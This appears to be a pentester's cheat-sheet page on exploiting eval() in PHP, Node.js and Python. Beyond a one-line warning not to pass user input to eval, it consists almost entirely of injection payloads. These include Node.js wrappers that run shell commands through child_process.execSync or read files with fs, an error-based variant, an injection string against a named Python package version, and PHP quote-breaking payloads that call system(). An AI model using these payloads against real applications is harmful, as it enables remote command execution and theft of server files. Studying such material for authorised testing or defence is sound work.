Exploiting 'eval' Function
Almost every language that we encounter during pentesting has an eval function that takes a string and execute the code inside.
Such function should be sparingly. Do not pass user input to them.
- PHP Eval Function
<?php
$payload = "echo 'Hello, World!';";
eval($payload);
- JavaScript/Node.js Eval Function
payload = 'console.log("Hello, World!")'
eval(payload)
- Python Eval (or Exec) Function
payload = "print('Hello, World!')"
eval(payload)
exec(payload)
Node.js 'eval' function
If the input is evaluated using eval, we can write some code in it.
- Normal input:
5 - Normal input wrapped:
(()=>5)() - Normal input fully wrapped:
(()=>{return 5})() - If it works, we can add some code in-between
(() => {
try {
return `Output: ${require('child_process').execSync('whoami').toString()}`
} catch (error) {
return `Error executing command: ${error}`
}
})()
// without spaces
(()=>{try{return(`Output:${require('child_process').execSync('whoami').toString()}`)}catch(error){return(`Error:${error}`)}})()
It's not always possible to return a string, but if errors are returned, you may use them instead of the usual vector.
(()=>{throw new Error(require("child_process").execSync("whoami").toString())})()
Additional payloads:
res.end(require('fs').readdirSync('.').toString())
res.end(require('fs').readFileSync('file').toString())
Python 'eval' function
Searchor 2.4.2
Poc (python script) (0.01k β).
$ onectf request -u URL -X POST -d 'engine=Yahoo' -p query -i '<q>, exec(""))#'
You can execute python code inside exec.
PHP 'eval' function
You can inject a function call such as phpinfo() while using comments such as ;// by remove appended code. If the payload is prepended by a quote, then add a matching quote.
<?php
$x = '';
eval('$x = "' . $payload . '";');
echo $x;
A few possible payloads:
$payload = '" . phpinfo() . "';
$payload = '" . phpinfo() . ";//';
$payload = '" . system("whoami") . ";//';
For payloads and filter bypass, refer to my PHP Cheatsheet.